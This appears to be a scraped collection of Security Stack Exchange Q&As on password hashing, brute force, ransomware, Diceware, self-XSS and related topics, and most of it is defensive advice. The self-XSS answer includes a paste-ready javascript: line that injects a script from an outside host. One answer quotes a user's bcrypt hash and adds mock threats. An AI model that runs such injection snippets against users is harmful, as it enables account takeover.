118,052 | According to Edward Snowden in this tweet ... Phones used in real-world ops are disposed on a per-action, or per-call basis. Lifetimes of minutes, hours. Not days. Let's imagine for a moment that I'm Jason Bourne. I've stopped by the kiosk in Waterloo Station and picked up a PAYG mobile phone. Presumably I've used fake ID. At the same time, my counterparty Jack Bauer is picking up a prepaid phone from a similar kiosk at Los Angeles International Airport. How do I actually place a call to him, given that both of us have new phone numbers? | Burner phone numbers as an OTP 'equivalent' You can think of the "identities" of those phones (phone number, SIM, phone itself/IMEI) as an equivalent of one-time pad encryption - you exchange the phone numbers (multiple) over a secure channel - e.g., when meeting in person; and then they're secure and provide no useful information (for network/metadata analysis) as long as you discard them after a single use. In your proposed scenario, Jack would have picked up a bunch of prepaid phone cards and given you the list of those numbers. Afterwards, if you'd need to contact him, you would call the first number on the list, have your conversation, and after that you could both discard the phones. If you'd expect a future call, then you'd turn on the phones corresponding to the second item on your lists. | {
"source": [
"https://security.stackexchange.com/questions/118052",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27877/"
]
} |
118,058 | I just checked https://haveibeenpwned.com/ and I have noticed that I was pwned, therefore I checked the file that hosts the details of my "credentials", however, I see my email in plain text but the password as a bcrypt hash. Since hash functions are one way and cannot be reversed, should I still be worried and change all my passwords or am I being too paranoid? EDIT: When I meant "all my passwords" I meant ones that are not closely relevant/similar to the exposed password. Obviously using the same password for almost all websites is quite stupid IMO. EDIT 2: I would like to ask for all of you to not share any information about how it is done. Thanks for your understanding. | A brief overview of weak hash algorithms vs. bcrypt With weak password hashing algorithms, what hackers will do is try millions, or billions of different combinations - as fast as their hardware allows for - and many easy passwords will fall quickly to rainbow tables / password crackers / dictionary-based attacks. Attackers will try to compare a massive quantity of strings to your hash, and the one that validates is very likely your password. Even if it isn't, you can still log in with it because you've found a collision. However, bcrypt is different. It's computationally slow, so this cracking will be slowed down immensely . Bcrypt can help slow cracking down to the point where you can only do a few tests per second, if that. This is due to the computational cost factor. You should read this answer by Thomas Pornin for a better explanation: If the iteration count is such that one bcrypt invocation is as expensive as 10 millions of computations of MD5, then brute-forcing the password will be 10 million times more expensive with bcrypt than with MD5. That's the point of having configurable slowness: you can make the function as slow as you wish. Or, more accurately, as slow as you can tolerate: indeed, a slow function is slow for everybody, attacker and defender alike. So it really depends on the added computational cost. Some custom hardware solutions are able to crack bcrypt hashes at upwards of 52k hashes per second. With a standard attack, and a poor password, you don't have much hope of holding out for long. Again, this depends on the computational cost: even this custom hardware solution can be forced down to 2-5 hashes per second, or even slower. Do not re-use passwords if you care about the accounts. I already found your credentials, and "cracked" your bcrypt hash But I won't hack you, don't worry. This is just to demonstrate why you should update your credentials, and stop-reusing your password. You wanted an answer, so what better than a live demonstration? You're from the U.K., correct? Your bcrypt hash is also $2a$10$omP392PbcC8wXs/lSsKZ5Ojv9.wFQ7opUn7u3YUBNu0kkbff0rB.m , correct? I already "cracked" your password, and I know your accounts. I see you, a thief on the roof. My new satellite link has both infrared and the x-ray spectrum. I see your heart beating; I see you are afraid. This should go without saying: you should definitely change your passwords. Start changing your credentials now... before it's too late. You should be worried, and you should change your passwords. Now. Yes, bcrypt can be extremely slow, but... I actually found a way to completely side-step the brute-forcing process with simple data aggregation and correlation. I wrote a little program that ties a few pieces of information together, and compares them. 
Not a password cracker or anything like that, but at the end of the day, it got the same job done. For your privacy - and as per your request - I will not share how I did this on here, but you should know that I am not the only one who can do it. If I can do it, so can others. However... you need to stop reusing passwords! You really, really do not want to keep doing that. If one site is compromised, having different passwords on other accounts protects the others from breaches as well. Update all of your accounts, even ones you haven't used in a while, and stop reusing passwords unless you don't care about them. You may want to consider something like KeePass. (A brief sketch of bcrypt's cost factor follows this entry.) | {
"source": [
"https://security.stackexchange.com/questions/118058",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/105070/"
]
} |
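To make the "configurable slowness" point above tangible, this editorial sketch times bcrypt at a few cost factors; each increment of the cost roughly doubles the work for attacker and defender alike. It assumes the third-party bcrypt package, and the absolute timings will of course vary by machine.

```python
import time

import bcrypt

password = b"correct horse battery staple"

for cost in (10, 12, 14):
    start = time.perf_counter()
    hashed = bcrypt.hashpw(password, bcrypt.gensalt(rounds=cost))
    elapsed = time.perf_counter() - start
    print(f"cost={cost}: {elapsed:.2f}s per hash "
          f"(~{1 / elapsed:.1f} guesses/second on this machine)")

# Verification reads the cost factor back out of the stored hash itself.
assert bcrypt.checkpw(password, hashed)
```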
118,077 | When I click to download a file through Firefox, a dialog window appears asking me whether I want to save the file somewhere or open it immediately once downloaded. The OK button in the dialog window starts disabled, and doesn't enable until the dialog has had focus for around a second. The dialog isn't modal, and if I focus on another window the OK button will disable and again won't re-enable until the window has held focus for a second. My partner lamented at this design, and asked me why she couldn't just click OK to download immediately - I responded that I've always thought it was a security feature. Now that I think about it however, I'm not certain exactly what behavior it could be preventing. I would have thought that it might prevent some malicious website from downloading a file secretly by forcing the download window to stay open for at least long enough to see whats going on - however it should be possible for a site to download stuff secretly in the background anyway. Regardless I presume most users would have clicked the 'do this automatically from now on' box at some point, and thus be unprotected anyway... So, is this a security feature? If so what does it protect against? | Yes, it is a security feature, and the purpose of the delay is to prevent attacks based around tricking the user into entering input to skip past the dialog by popping it up unexpectedly when the user is in the middle of inputting multiple key presses or mouse clicks in quick succession. The two examples that are given in this blog post explaining the feature are: A CAPTCHA that asks the user to type the word only . When they press n , a save dialog is popped up, and then the user will immediately press l and then y , which is the keyboard shortcut for OK on some browsers, unintentionally confirming the download A webpage that convinces the user to double-click somewhere on screen, positioned so that when the dialog opens after the first click, their mouse pointer is right over the "OK" button, meaning that they immediately confirm it. By disabling the button for several seconds, the input has no effect. Mozilla bug report about the issue | {
"source": [
"https://security.stackexchange.com/questions/118077",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/47290/"
]
} |
118,114 | I'm currently an engineer on a project in the development phase. One 'module' on this project gives the ability for user authentication/authorization. However it's come to our attention that the password hashing algorithm may not be up to scratch (aka not bcrypt). (The terrible thing is that we're not quite sure what it is or where it came from!) This obviously has to change and the patch is being scheduled. We naturally have to update all our test users because their passwords will be using the old hashing method; not much of a problem, since all our demo users are automated on build, so it's just a matter of updating the script. But the next question is: what if this is a production system with any number of active and stale users? What would be best practice? 1. Automatically force a password reset on every user? This will notify every user that their password has been changed and may cause questions/confusion and may cause suspicion that there's been a security breach. More questions may be asked which may not necessarily be able to be answered by website stakeholders. 2. Update the DB to flag whether it's the new or old method, then once a user has been authenticated, update their password in the DB using the new method. Requires a bit of logic in the service, and the transition will be seamless to any existing user. The problem being: if there was a breach then it may be evident that there are two methods going on here, and if the less secure one is found to be that insecure it could obviously be broken. 3. Reset all passwords, using a bcrypted version of the existing hash. Flag it as the old style, so on successful authentication it just keeps a hash of the password rather than a hash of a hash. | Your option 1. is a bad idea: in addition to the User-Experience / Public-Relations reasons you state, you're also giving attackers a window to intercept the password reset tokens and compromise every account on your server. It also doesn't solve your problem if you have even one user who's too lazy to log in / update their password. At first glance, both 2. and 3. seem fine to me. Your #2 is no less secure than what you're doing now, but 2. would mean you have to continue supporting the current weak login forever (or do something like "After X months we're wiping your password and forcing you to do a recovery" which breaks the nice user-transparency you want, so let's ignore that). Let's consider the case where you have users in the DB who will never log in again. With both 2. and 3. you have to continue to support the current hashing alg in your code-base forever just in case they do log in, but at least 3. has the advantage that they (or rather, you) are protected against offline brute-force attacks if your DB is ever stolen. Since you'll have to keep the "old style flag" column around forever, do yourself a favour and make it an int not a bool so that if you ever have to update your password hashing alg again, you can record which old style they are on. UPDATE: A very similar question was asked here and built on the discussion from this thread. (A short migration sketch follows this entry.) | {
"source": [
"https://security.stackexchange.com/questions/118114",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/99675/"
]
} |
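An editorial sketch of option 3 as endorsed above: wrap the existing hashes in bcrypt offline, record the scheme in an int column, and silently re-hash to plain bcrypt on the next successful login. Purely for illustration it assumes the unknown legacy scheme was unsalted MD5; the scheme constants and helper names are invented for the example, and it needs the third-party bcrypt package.

```python
import hashlib
import hmac

import bcrypt

# Scheme versions stored per user as an int (not a bool), so later migrations fit too.
LEGACY = 0            # the old, weak scheme (assumed here, for illustration, to be unsalted MD5)
BCRYPT_OF_LEGACY = 1  # bcrypt wrapped around the old hash (offline migration, option 3)
BCRYPT = 2            # plain bcrypt of the password (set after the next successful login)

def legacy_hash(password: str) -> bytes:
    return hashlib.md5(password.encode()).hexdigest().encode()

def migrate_row(stored_legacy_hash: bytes):
    """One-off DB migration: wrap every existing hash in bcrypt, no user action needed."""
    return BCRYPT_OF_LEGACY, bcrypt.hashpw(stored_legacy_hash, bcrypt.gensalt())

def verify_and_upgrade(password: str, scheme: int, stored: bytes):
    """Check a login attempt and, on success, silently re-hash with plain bcrypt."""
    if scheme == BCRYPT_OF_LEGACY:
        ok = bcrypt.checkpw(legacy_hash(password), stored)
    elif scheme == BCRYPT:
        ok = bcrypt.checkpw(password.encode(), stored)
    else:  # LEGACY rows should no longer exist after the offline migration
        ok = hmac.compare_digest(stored, legacy_hash(password))
    if ok and scheme != BCRYPT:
        return True, BCRYPT, bcrypt.hashpw(password.encode(), bcrypt.gensalt())
    return ok, scheme, stored

# Demo: an existing user row before and after migration, then a normal login.
scheme, stored = LEGACY, legacy_hash("hunter2")
scheme, stored = migrate_row(stored)
ok, scheme, stored = verify_and_upgrade("hunter2", scheme, stored)
print(ok, scheme)  # True 2 -> this user is now on plain bcrypt
```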
118,119 | Let's say I have one server called A which hosts an upload website and is connected to network connection B. Let's say one of my clients uploads multiple .rar files of 1 MB (that contain malware parts) and when I unzip them I rebuild the malware. Is there a way to detect those malware parts before I unzip the files? Can I have a firewall/device that will check all the files between A and B and block them? Is this technically possible? | | {
"source": [
"https://security.stackexchange.com/questions/118119",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/98652/"
]
} |
118,147 | I have read that GPUs can be used in brute-force attacks. But how can this be done, and is there a need for any other hardware devices (hard disks, for instance)? Note: I'm more interested in web application security, but I don't want to put on blinders. I'm sorry if my question seems ridiculous to you, but my hardware background isn't very good. I just know how basic components work together and how to combine them. | I'm choosing to assume you're asking why it's a risk rather than how to hack. GPUs are very good at parallelising mathematical operations, which is the basis of both computer graphics and cryptography. Typically, the GPU is programmed using either CUDA or OpenCL. The reason they're good for brute-force attacks is that they're orders of magnitude faster than a CPU for certain operations - they aren't intrinsically smarter. The same operations can be done on a CPU, they just take longer. | {
"source": [
"https://security.stackexchange.com/questions/118147",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/94890/"
]
} |
118,241 | I have read on the net that authorities are having trouble monitoring PlayStation 4 communications. As usual, the news reports are very non-technical. What makes the PlayStation 4 network harder to intercept? | Much of that news was just sensationalism, not fact. Reports surfaced afterwards that security agencies monitor Xbox and PlayStation communications. It came up because a PlayStation was found in one of the Paris attackers' flats. It was baseless and was debunked quickly ( https://motherboard.vice.com/read/how-the-baseless-terrorists-communicating-over-playstation-4-rumor-got-started ), however that didn't stop the hoax. The communications also don't use crypto, as opposed to many better techniques for secret communications. So the answer is: it's quite easy to intercept, and Sony probably already helps law enforcement do it. Some reports even say they are also using algorithms to search for suspicious activity themselves. | {
"source": [
"https://security.stackexchange.com/questions/118241",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/104030/"
]
} |
118,344 | Recently I used a tool to download a website and as part of the tool one could adjust the number of parallel connections. So now I found myself asking: starting from how many requests a provider could rate it as a denial of service. I googled around however didn't find specific numbers or at least hints about what dimensions we are talking about. Is there any definition e.g. like 100 requests a second? So my question is: How many requests are needed to state that a denial of service is in progress? Update: the technical background is definitely of interest. I understand that one malicious packet could be enough to cause a denial of service or the slashdot effect is another. But what I wanted to know was more of a firewall style rule: Some servers / service providers block out users which send too many requests in a certain time frame. About what dimension are we talking about here? Or is that too specific? If so what would your rule look like? The question also had a legal component - let me illustrate a high(!) theoretical scenario: A provider of a service checks its logs and sees that there has been high traffic from a single IP. Now the provider goes to court (for whatever reason) and labels this as an attempted denial of service. The judge would probably ask for their definition of a DoS. "Anything beyond the normal usage" would be their answer. So where is the threshold between normal usage and "none" normal usage (which could be interpreted as an attempted DoS even if the server remains totally unimpressed and this is probably a highly constructed scenario ;-) | Enough to cause the service to be denied to someone. Might be 1 unexpected malicious request, which causes excessive load on the server. Might be several million expected requests, from a TV advert with a really good response. There isn't a specific value, since all servers will fail at different levels - serving static content is a lot easier on the server than generating highly customised content for each user, so generally authenticated services will have a lower "problem" threshold than unauthenticated ones. Servers sending the same file to multiple users may be able to handle more traffic than servers sending distinct files to multiple users, since they can hold the file in memory. A server with a fast connection to the internet will usually be able to handle more traffic than one with a slow connection, but the distinction might be less dependent on that if the generated traffic is CPU bound. I've seen systems that fail at 3 requests per second. I've also seen systems which handle everything up to 30,000 requests per second without breaking a sweat. What would be a DoS to the first, would be a low traffic period to the second... Updated to respond to update How do firewall providers determine when traffic is causing a denial of service? Usually, they watch for response times from the server, and throttle traffic if they go above a pre-set limit (this can be decided on a technical basis, or on a marketing basis - waiting x seconds causes people to leave), or if the server responses change from successful (200) to server failure (50x). What is a legal definition of "denial of service"? Same as the original one I gave - it's not denial of service if service has not been denied. It might be abusive, but that wouldn't be quite the same thing. | {
"source": [
"https://security.stackexchange.com/questions/118344",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/105378/"
]
} |
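As a rough illustration of the "firewall-style rule" discussed in the entry above, the sketch below (Python) blocks an IP once it exceeds a fixed number of requests per sliding time window. The limit of 100 requests per 10 seconds is an arbitrary placeholder, not a recommended threshold.

import time
from collections import defaultdict, deque

class SlidingWindowLimiter:
    def __init__(self, max_requests=100, window_seconds=10.0):
        self.max_requests = max_requests
        self.window = window_seconds
        self.hits = defaultdict(deque)   # ip -> timestamps of recent requests

    def allow(self, ip: str) -> bool:
        now = time.monotonic()
        q = self.hits[ip]
        # Drop timestamps that have fallen out of the window.
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.max_requests:
            return False                 # over the threshold: throttle or block
        q.append(now)
        return True

limiter = SlidingWindowLimiter()
print(limiter.allow("203.0.113.7"))      # True until the window fills up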
118,411 | Is having a longer/more complex username considered more secure than using a shorter/basic one? Would the uniqueness of a username positively impact security? This is assuming that adversaries aren't aware of what the username may be, e.g. a remote terminal login. | A harder-to-guess username adds to security if it's kept secret. The problem is that usernames are often not kept especially secret: on most systems allowing multiple users to log in, any user can view the list of valid users; on systems that run mailservers, the mailserver can effectively be used to check if a username might be valid, as most mailservers will accept mail for any local user; various programs may include your username by default in outgoing traffic when they connect to servers; and new-user signup forms or password recovery forms may allow an attacker to check if a username is taken. On top of that, usernames are often harder to change than passwords. So when adding additional complexity to your login credentials, it's best to get into the habit of putting that extra complexity in the password rather than the username. | {
"source": [
"https://security.stackexchange.com/questions/118411",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2916/"
]
} |
118,445 | A firm has 10 million files, all ransomware-encrypted, but the firm has all of those 10 million files backed up, and almost all of them have not changed. Would comparing all of those files against their unencrypted backups, in addition to the other cracking algorithms, help discover the key? | What you are suggesting is a known-plaintext attack, and yes, if the encryption algorithm is bad enough, it could be used to discover the key or keys used to encrypt the data, depending on the cipher used. I say keys because some ransomware uses individual keys per file, so cracking one key would only give you the key to that file. Practically, this is unlikely to be useful: unless the ransomware's encryption scheme has some sort of flaw (weak cipher, poor pseudo-random data source, small key, etc.) or you have access to massive decryption computing resources, your great-grandchildren might just live to see one of the files cracked. | {
"source": [
"https://security.stackexchange.com/questions/118445",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/105489/"
]
} |
118,450 | I always hear "A long password is good, a longer password is better". But is there such a thing as "the password is so long it is becoming unsafe" or "the password is long enough, making it longer won't matter"? I am interested in the security of the password with regard to cracking only - not whether it can cause a DoS (overloading the servers while hashing), or whether the vendor thinks otherwise. Also assume the password does not contain any dictionary words (that'd be a topic for the comments anyway), is stored using best practices, has a strong and unique salt, and relevant entropy per character. How the user will remember / recall / store the password also doesn't matter. I agree that longer passwords are safer. I'm asking about the upper limit. Is there a length (or entropy size) where making the password longer no longer (sic) matters, or even weakens its security? I know it depends on the hashing algorithm; if the upper limit for a given algorithm exists and is known, what is it? | 128 bits (of entropy). The main purpose of a longer password is to prevent brute force attacks. It is generally accepted that 128 bits is beyond anyone's capability to brute force, and will remain so for the foreseeable future. You see this figure in a few places, e.g. SSL ciphers with 128-bit or greater key length are considered "high security" and OWASP recommends that session tokens be at least 128-bit. The reasoning is the same for all these - 128 bits prevents brute force attacks. In practice, if a password is made of upper and lower-case letters, numbers, and a little punctuation, there is approximately 6 bits of entropy in each character, so a 128-bit password consists of 22 characters. A password can be compromised in ways other than brute force. Perhaps there is a keylogger on the client system, or the user gets phished. Password length makes almost no difference to these attacks - even a 1000-bit password would be captured just the same. And these attacks are common in practice, so it really isn't worth using passwords that are too long. In fact, you can get away with a bit less than 128 bits. If the password is hashed with a slow hash function like bcrypt, that makes a brute force attack harder, so 100 bits (or thereabouts) completely prevents brute force attacks. If you're only concerned with online attacks, and the site has a lockout policy, then you can get away with less still - 64 bits would completely prevent a rate-limited online brute force attack. | {
"source": [
"https://security.stackexchange.com/questions/118450",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/44336/"
]
} |
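A quick sketch of the arithmetic behind the 22-character figure in the answer above: assuming a character set of roughly 64 symbols (about 6 bits of entropy per character), the snippet below computes how many such characters are needed to reach a given entropy target.

import math

def chars_needed(target_bits: float, charset_size: int) -> int:
    bits_per_char = math.log2(charset_size)   # 6.0 bits for a 64-symbol set
    return math.ceil(target_bits / bits_per_char)

print(chars_needed(128, 64))   # 22 characters, matching the figure above
print(chars_needed(100, 64))   # enough when a slow hash such as bcrypt is used
print(chars_needed(64, 64))    # enough against a rate-limited online attack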
118,568 | I'm developing a web service that stores sensitive personal information (such as telephone numbers, addresses, full names, and email addresses) in a database, such that it can be accessed from anywhere with an Internet connection. As part of this, it's obviously a good idea to be encrypting that data to add security against being hacked. It has to be encryption rather than hashing because the data has to be accessed again. I would also like to do this encryption such that each user has their own decryption key. This means that even administration can't access the data, which also protects against internal corruption. Given that I've already got user accounts, is it acceptable to use the user's password as the encryption key? That leaves me with a process like this: User signs up. Hash their password, as normal. User creates some entries and saves them. User signs out. Ask for their password, check it against the stored hash to verify it, then use it to encrypt everything they have in the database. User signs in. Verify their password, then use it to decrypt everything they have. Obviously this isn't the best possible security - but are there any major flaws with this method? | If you do the encryption and decryption on the server-side, there is always a chance for an administrator to decrypt the data without the knowledge of the user, by modifying the system so that when a user legitimately decrypts his or her data, the decryption key is stored to be used at the leisure of other interested parties, for instance, in the service of warrants. That said, the scheme you describe is generally along the lines of how systems like this are in fact built, and in normal use, are reasonably secure. There are a couple of caveats, or clarifications, however. You would not use the password directly as a key. You would use a PBKDF such as bcrypt, scrypt, or PBKDF2 to turn the password into a strong random key using as high a work factor as makes sense for your application. You would generally not use this key to encrypt the data directly. You would generate a strong random key on the server that will be the actual data encryption key (DEK). The key derived from the password will then be used as a key-encryption-key (KEK) to encrypt the DEK. This way, if a user decides to change their password, you generate a new KEK, and you only have to re-encrypt the DEK, and not all of the data. With this system, you're not actually required to store a password hash at all. When a user logs in, you merely need to derive the KEK, decrypt the DEK, and determine if it can correctly decrypt data for the user. If it can, the password is correct. If not, it isn't, and you can fail the authentication attempt. This may or may not be desirable depending on the application. | {
"source": [
"https://security.stackexchange.com/questions/118568",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/47013/"
]
} |
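A minimal sketch of the KEK/DEK layering described in the answer above, assuming the third-party Python "cryptography" package is available; the scrypt parameters and the use of Fernet for wrapping are illustrative choices, not a vetted configuration.

import base64
import os
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives.kdf.scrypt import Scrypt

def derive_kek(password: bytes, salt: bytes) -> bytes:
    # Password -> key-encryption-key via a PBKDF (scrypt here).
    kdf = Scrypt(salt=salt, length=32, n=2**14, r=8, p=1)
    return base64.urlsafe_b64encode(kdf.derive(password))

# At signup: generate a random DEK and store only the salt plus the wrapped DEK.
salt = os.urandom(16)
dek = Fernet.generate_key()                       # data-encryption key
wrapped_dek = Fernet(derive_kek(b"correct horse battery", salt)).encrypt(dek)

# At login: re-derive the KEK and unwrap the DEK; failure means a wrong password.
dek_again = Fernet(derive_kek(b"correct horse battery", salt)).decrypt(wrapped_dek)
record = Fernet(dek_again).encrypt(b"user's sensitive record")
print(Fernet(dek_again).decrypt(record))

# A password change only re-wraps the DEK; the bulk data stays untouched.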
118,643 | Diceware passphrase lengths are on the rise - up to six or seven words now. The old adage that passphrases are easier to remember may be true for shorter phrases, but six truly random words can be tough to remember. On the other hand, full sentences may be easier for some to remember. Take for example the Diceware-generated passphrase tracy optic renown acetic sonic kudo . We could turn that into a (nonsensical) sentence such as Tracy's optics were renowned, but her acetic sonic cost her kudos. The Diceware passphrase has an entropy of 77.4 if the attacker knows you're using six Diceware words ( 12.9 per word ), and 107.219 (according to this calculator ) if they don't. The sentence form has an entropy (according to the calculator) of 255.546. However, it's not fully random any more, which is supposed to be one of the big benefits of the Diceware approach. Assuming that the attacker somehow knows that you're using this method of passphrase generation, does the sentence form decrease the security of the passphrase in any way? For example, perhaps they can use some kind of analysis of English sentence structure to narrow down their required guesses? Assuming the answer to the above is "No, sentence form does not decrease security," then here's another consideration: One benefit of the sentence format is that it's very long and includes non-alphabetical characters (e.g. the apostrophe and comma). However, that's a definite downside when trying to type it on a mobile device. Say we shorten the Diceware phrase to three words - tracy optic renown - and then turn that into an [a-z] sentence - tracy is optically renowned or perhaps tracy is optically renowned worldwide (to further distinguish it from the Diceware wordlist). If we were to use three Diceware words and the attacker knows we're using Diceware then we have an entropy of 38.7. However, tracy is optically renowned worldwide is 100.504 bits of entropy according to the calculator. Given the differences between the three-word Diceware phrase and the short sentence form, which entropy calculation is more accurate - the Diceware calculation (i.e. the differences are too slight to matter) or the calculator's calculation (dictionary/brute-force/etc.)? Note: assume that any length or combination of characters is acceptable for the password | It does not decrease the security. What is actually happening is that your "entropy calculator" is giving you a false measure of entropy. It can only give an approximate estimate, after all. There are actually interesting proofs that show that one can never actually know the amount of entropy in a particular string of text unless you know something about how it was constructed. A pass string 1000 words long created by a "physical random number generator" like a resistor noise network will appear to have the same amount of entropy as a pass string 1000 words long generated using a Mersenne Twister, until you realize that the Mersenne Twister actually leaks all of its seed information in any contiguous block of 624 values. Entropy calculators can only make heuristic assumptions about how random the data actually is. This, of course, is why we have Diceware. It can prove [an underestimate on] entropy because randomness is built into the process. To prove the security of a pass-sentence like you are looking at, consider an oracle test. I select a bunch of words using Diceware, and then I build a sentence out of them. I then provide you with an oracle which constructs sentences out of them.
It is guaranteed that, if you provide the oracle with the correct set of selected words from Diceware, it will provide exactly the sentence I used. For all other sets of words, it will produce an arbitrary sentence using them. It is trivial to see that the entropy of my password cannot possibly be lower than the entropy built into the Diceware words I selected. Even with this immensely powerful oracle to reduce the very human process of sentence formation to nothingness, the randomness from diceware will remain. You cannot guess my password any faster than you could guess the original set of Diceware words I selected. Now there are a few caveats. If you use fewer diceware words, like your later example, you get fewer bits of entropy from the diceware layer. This means that oracle I mentioned above becomes more and more helpful for breaking the sentence based password. Also, some of the sets of words you get from diceware can be particularly difficult to turn into sentences. If you ever reject a set of diceware words as part of your pass-sentence building process, you are calling into question the perfect randomness that diceware relies on. Now, why the oracle attack? Oracles are very powerful tools for testing cryptographic theory. In reality, tracy is optically renowned worldwide is actually probably quite a lot stronger than the 38.7 bits from the diceware words tracy optic renown . Breaking that sentence will take more work than the words, though probably not the full 100.504 bits the entropy calculator heuristically estimates. So how much stronger? We don't know. That's the point of oracle attacks. In an oracle attack we say "let's just assume this hard to calculate part of the process offers zero increased security. None at all. Is the process still secure?" If it is secure under this extreme assumption, then it is clearly secure against real life attacks where the attacker doesn't necessarily have such a magically powerful oracle at their disposal. | {
"source": [
"https://security.stackexchange.com/questions/118643",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/104969/"
]
} |
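The entropy figures quoted in the question above can be reproduced with a few lines of Python: each Diceware word is one of 6^5 = 7776 equally likely choices, so it contributes log2(7776), about 12.9 bits, no matter how the words are later dressed up as a sentence. The tiny word list below is only a stand-in for the real 7776-word Diceware list, so just the code shape matters.

import math
import secrets

WORDS_PER_PHRASE = 6
bits_per_word = math.log2(6 ** 5)                  # log2(7776)
print(round(bits_per_word, 3))                     # 12.925 (rounded to 12.9 in the question)
print(round(WORDS_PER_PHRASE * bits_per_word, 1))  # 77.5 bits for six words (quoted as ~77.4)

# Picking words with a CSPRNG instead of physical dice.
wordlist = ["tracy", "optic", "renown", "acetic", "sonic", "kudo"]   # placeholder list
phrase = " ".join(secrets.choice(wordlist) for _ in range(WORDS_PER_PHRASE))
print(phrase)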
118,709 | I used a dongle before getting a phone, but now use my phone as a hotspot. I don't want my phone to get malware or viruses. Can my phone get viruses if I use it as a hotspot while downloading torrents? | It is very unlikely that your phone would get infected just by passing (potentially malicious) traffic through. After all, routers on the Internet relay tons of malicious traffic every day without getting compromised themselves. However, the danger begins when your computer itself gets compromised by a malicious file downloaded via torrents; from there, the malware on your computer could compromise other hosts on your network, such as your phone. | {
"source": [
"https://security.stackexchange.com/questions/118709",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/105748/"
]
} |
118,804 | Recently it seems there has been a big outbreak of zip files being emailed to people with a .js file containing code that downloads and executes cryptoware. How does the .js actually get executed, though? Do users have to execute the JavaScript file itself after extracting it, or is it somehow possible to make the JavaScript file execute upon extraction? I am rather confused about how this causes so many infections. | Do you remember "I love you"? Human curiosity often does the trick: users unarchive the zip and then execute the JS themselves (via the Windows Script Host, which does not follow the same restrictions as a browser's JS engine). There are more than enough people who want to be sure they didn't miss a payment and worry they will be cut off from their mobile phone soon. A fundamental unawareness of how email works is another great factor here: The email comes from Tom! And he says I should have a look. Tom always shares funny images on Facebook, let's see! Completely unaware of email-sender spoofing (which shouldn't be a problem with DKIM, SPF, S/MIME and PGP around, but that's another story), those users just trust the sender and open the files. INORITE? But that's just human curiosity bundled with a fatal lack of knowledge. | {
"source": [
"https://security.stackexchange.com/questions/118804",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8614/"
]
} |
118,847 | Given the fact that modern browsers these days prohibit JavaScript from having access to any resources on the client's machine, does JavaScript execution from the address bar pose any threat at all to the client's machine (the machine the browser is running on)? | JavaScript executed from the address bar will run in the context of the website displayed in that tab. This means complete access to that website, and it could change how the website looks and behaves from the point of view of the user. This attack is called self-XSS and can cause harm to the user and, indirectly, to the machine. A reputable website could be made to ask the user to download and install a malicious piece of executable code by pretending, for example, that it needs a Flash update. To get a nice visual example of this, manually type javascript: in your address bar and then paste this: z=document.createElement("script");z.src="https://peniscorp.com/topkek.js"; document.body.appendChild(z); If you don't trust me, do it in the address bar of a website you are not logged in to. Most browsers have recognised this risk and attempt to limit the impact by stripping the javascript: prefix when javascript:some_js_code is pasted into the address bar. But it is still possible to type it manually and execute it. | {
"source": [
"https://security.stackexchange.com/questions/118847",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/27398/"
]
} |
118,853 | I had a landline phone call about xyz with an xyz expert (also on a landline) for about an hour, for the first time. After a couple of days I started getting suggested links on websites as ads exactly about xyz's services. Question: In theory, either my landline phone company or my smartphone is listening in, then probably selling my info. Is this type of ad profiling common and/or legal? Or was it pure chance I saw the targeted ad? Update from comments: I am based in the UK. I never did a web search on the xyz topic, nor sent/received emails regarding this topic. That is why I am assuming phone calls are being profiled. As pointed out, the legality side belongs to a different SE, so just in case: if anyone can provide the legal side of the question, it would be a huge bonus. Updated question: I am also curious if these types of practices exist at all: a landline company keeping track of certain word frequencies, or my smartphone doing something similar, even when it is not in use. | Data dealers often buy data from multiple sources and aggregate it to generate an all-encompassing user profile. For example: the xyz company sold your telephone number and what the conversation was about; a social network which asks for your phone number for password recovery sold your telephone number and your IP address at some point in time; and an advertisement network sold the tracking cookie ID for that IP address at that point in time. Now the data dealer has linked your call with xyz to your identity on the advertisement network and can pay the advertisement network to show you xyz-related advertisements. To prevent this from happening in the future: Look at the privacy policy of any companies and websites you interact with and refuse to do business with them when the policy allows them to resell your data. Do not reveal more personal information to internet services than strictly necessary. Use a browser plugin like Ghostery or Privacy Badger to block web trackers (keep in mind that advertisement filters like AdBlock only block visible advertisements and are not designed to prevent invisible trackers from tracking you). Inform yourself about what rights to privacy you have according to your local laws and make use of them (for example, in many EU countries you have the right to order companies to tell you what private information they have about you and can order them to delete it). | {
"source": [
"https://security.stackexchange.com/questions/118853",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/35444/"
]
} |
118,975 | Lately I've seen plenty of APIs designed like this: curl "https://api.somewebsite.com/v1/something&key=YOUR-API-KEY" Isn't it elementary that passing an API key in a query string as a part of the URL is not secure at least in HTTP. | This is commonly known as a capability URL / secret URL. It's secure in modern websites but not suitable for all applications and requires significant care to use . You can find an excellent overview of their advantages, risks and best practices in this page by W3C . It's meaningless to talk about security without specifying a threat model. Here are a couple that come to mind: 1: A passive attacker on the network (eavesdroping) 2: An active attacker on the network (can change packets at will, mitm, etc) 3: A shoulder-surfer 4: An attacker with physical access to your computer / elevated privileges 5: another user of your computer (regular privileges / remote access) 6: the user itself (as in protecting a API key) Regarding network attacks (1 and 2), capability URLs are perfectly secure , provided you're using HTTPS (it's 2016, you shouldn't be using HTTP anymore!). While the hostname of a server is sent in plaintext over the network, the actual URL is encrypted before being sent to the server - as it's part of the GET request, which only occurs after the TLS handshake. Regarding shoulder-surfing (3), a capability URL with enough entropy is secure against a casual attack, but not against a dedicated attacker · As an example, a google docs URL: https://docs.google.com/document/d/5BPuCpxGkVOxkjTG0QrS-JoaImEE-kNAi0Ma9DP1gy Good luck remembering that while passing by a co-worker's screen! 